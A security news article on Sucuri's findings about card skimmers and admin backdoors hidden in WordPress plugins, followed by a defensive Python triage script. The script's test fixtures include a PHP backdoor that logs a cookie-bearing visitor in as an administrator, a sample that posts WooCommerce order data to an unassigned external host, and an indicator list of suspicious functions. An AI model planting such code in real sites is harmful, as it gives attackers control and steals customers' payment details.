Credit card skimmers are being injected into arbitrarily chosen e-commerce WordPress plugins, where they go unnoticed while harvesting customers' payment details.
Card-stealing threat actors are stepping up their efforts to plant covert skimmers on online stores as the holiday shopping season approaches, so site administrators should be on alert.
Injecting the skimmer into a plugin's files is the latest twist: it keeps the malicious code out of the closely monitored ‘wp-admin’ and ‘wp-includes’ core directories, where injections tend to be spotted and removed quickly.
According to new research from Sucuri, the fraud starts with an initial compromise of the WordPress site, after which the attackers plant a backdoor to keep their access.
Even if the administrator installs the newest security updates for WordPress and every installed plugin, the attackers can still get back into the site through these backdoors, which patching alone does not remove.
When the backdoor is later invoked, it looks up a list of administrator users and grants the attackers access as one of them through that user's authorization cookie and current-user login.
When Sucuri's analysts examined the code, they found references to WooCommerce and undefined variables inside an image optimization plugin. The plugin itself has no known vulnerabilities and appears to have been chosen at random as a hiding place.
Using PHP's get_defined_vars() function, Sucuri determined that one of these undefined variables resolved to a domain hosted on an Alibaba server in Germany.
That domain had no connection to the compromised site under investigation, which was based in North America.
A 404-page plugin on the same site carried a second injection: the actual credit card skimmer, built with the same approach of hidden variables in otherwise unobfuscated code.
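The tells described above (a plugin file that references variables it never assigns, WooCommerce hooks showing up in an image plugin, and a backdoor that logs in as an administrator) can be turned into a first-pass triage check. The script below is an added example written for this page; it is not Sucuri's tooling or any plugin's code. The indicator list, the slug keywords used to decide whether a plugin is commerce-related, and the three sample PHP files are constructed assumptions. It reports variables referenced but never assigned in a file (the same tell the analysts followed with get_defined_vars()), a short list of functions worth a second look, and WooCommerce references in plugins whose name suggests nothing to do with payments:

```python
"""Heuristic triage of WordPress plugin files for the injection pattern discussed
above. Indicator list, slug keywords and sample files are assumptions made for this
example, not taken from Sucuri's report or from any real plugin."""
import re
import tempfile
from pathlib import Path

# Variables PHP provides in every scope; never reported as undefined.
PHP_BUILTIN_VARS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_COOKIE", "_FILES",
                    "_REQUEST", "_SESSION", "_ENV", "this", "argv", "argc"}
# Assumed indicator list. wp_set_current_user/wp_set_auth_cookie are legitimate
# WordPress functions, but a plugin that logs users in without having a login
# feature needs explaining.
INDICATOR_RE = re.compile(r"\b(get_defined_vars|base64_decode|eval|gzinflate"
                          r"|wp_set_current_user|wp_set_auth_cookie)\s*\(")
WOO_HINTS = ("woocommerce", "wc_get_order", "billing_", "card_number")
COMMERCE_SLUG_WORDS = ("woo", "commerce", "pay", "checkout", "cart")

VAR_RE = re.compile(r"\$([A-Za-z_]\w*)")
# "$x = ", "$x[] = ", "$x .= " ...; not "==", "=>", "!=" or "->".
ASSIGN_RE = re.compile(r"\$([A-Za-z_]\w*)(?:\s*\[[^\]]*\])*\s*(?:=(?![=>])|\.=|\+=|-=)")
PARAMS_RE = re.compile(r"\bfunction\b[^(]*\(([^)]*)\)(?:\s*use\s*\(([^)]*)\))?")
FOREACH_RE = re.compile(r"\bforeach\s*\(.*?\bas\s+(?:&?\$(\w+)\s*=>\s*)?&?\$(\w+)", re.S)
DECL_RE = re.compile(r"\b(?:global|static)\s+(\$[^;(]+);")

# Constructed sample files for the demo: not real plugin code and not real malware.
CLEAN_SAMPLE = """<?php
function img_opt_resize($path, $width) {
    $img = imagecreatefromjpeg($path);
    $out = imagescale($img, $width);
    foreach (array(80, 90) as $k => $q) { $quality = $q; }
    return $out;
}
"""
SKIMMER_SAMPLE = """<?php
add_action('woocommerce_checkout_order_processed', 'img_opt_cache_warm');
function img_opt_cache_warm($order_id) {
    $order = wc_get_order($order_id);
    $blob = base64_encode(serialize($order->get_data()));
    // $cdn_origin is never assigned anywhere in this file
    wp_remote_post('https://' . $cdn_origin . '/warm', array('body' => $blob));
}
"""
BACKDOOR_SAMPLE = """<?php
if (isset($_COOKIE['img_opt_seed'])) {
    $admins = get_users(array('role' => 'administrator', 'number' => 1));
    wp_set_current_user($admins[0]->ID);
    wp_set_auth_cookie($admins[0]->ID);
}
"""
SAMPLES = {"image-optimizer/image-optimizer.php": CLEAN_SAMPLE,
           "image-optimizer/cache-warm.php": SKIMMER_SAMPLE,
           "image-optimizer/seed.php": BACKDOOR_SAMPLE}


def undefined_variables(php_source: str) -> set[str]:
    """Names used as $name that this file never assigns, declares or receives."""
    defined = set(PHP_BUILTIN_VARS) | set(ASSIGN_RE.findall(php_source))
    for params, use_vars in PARAMS_RE.findall(php_source):
        defined |= set(VAR_RE.findall(params)) | set(VAR_RE.findall(use_vars))
    for key, value in FOREACH_RE.findall(php_source):
        defined |= {name for name in (key, value) if name}
    for decl in DECL_RE.findall(php_source):
        defined |= set(VAR_RE.findall(decl))
    return set(VAR_RE.findall(php_source)) - defined


def scan_php(php_source: str, plugin_slug: str) -> list[tuple[str, str]]:
    """(category, detail) findings for one plugin file; empty list when clean."""
    findings = []
    missing = undefined_variables(php_source)
    if missing:
        findings.append(("undefined-variable", ", ".join("$" + n for n in sorted(missing))))
    hits = sorted(set(INDICATOR_RE.findall(php_source)))
    if hits:
        findings.append(("indicator", ", ".join(hits)))
    if not any(word in plugin_slug.lower() for word in COMMERCE_SLUG_WORDS):
        woo = [hint for hint in WOO_HINTS if hint in php_source.lower()]
        if woo:
            findings.append(("woocommerce-reference", ", ".join(woo)))
    return findings


def scan_plugins(plugins_dir: Path) -> dict[str, list[tuple[str, str]]]:
    """Scan every .php file below wp-content/plugins, keyed by plugin-relative path."""
    report = {}
    for php_file in sorted(plugins_dir.rglob("*.php")):
        rel = php_file.relative_to(plugins_dir)
        findings = scan_php(php_file.read_text(errors="replace"), rel.parts[0])
        if findings:
            report[rel.as_posix()] = findings
    return report


def demo_report() -> dict[str, list[tuple[str, str]]]:
    """Write the constructed samples into a temporary plugins tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, source in SAMPLES.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(source)
        return scan_plugins(Path(tmp))


if __name__ == "__main__":
    print(*(f"{p}: {c}: {d}" for p, f in demo_report().items() for c, d in f), sep="\n")
```

Point scan_plugins() at a copy of wp-content/plugins and review every hit by hand: the undefined-variable check is a regex approximation of PHP scoping, so variables introduced through compact(), extract(), include or string interpolation tricks will produce both false positives and false negatives, and the indicator functions all have legitimate uses. The authoritative check remains a file-by-file diff of each plugin against the pristine release from wordpress.org; this scan only tells you where to look first.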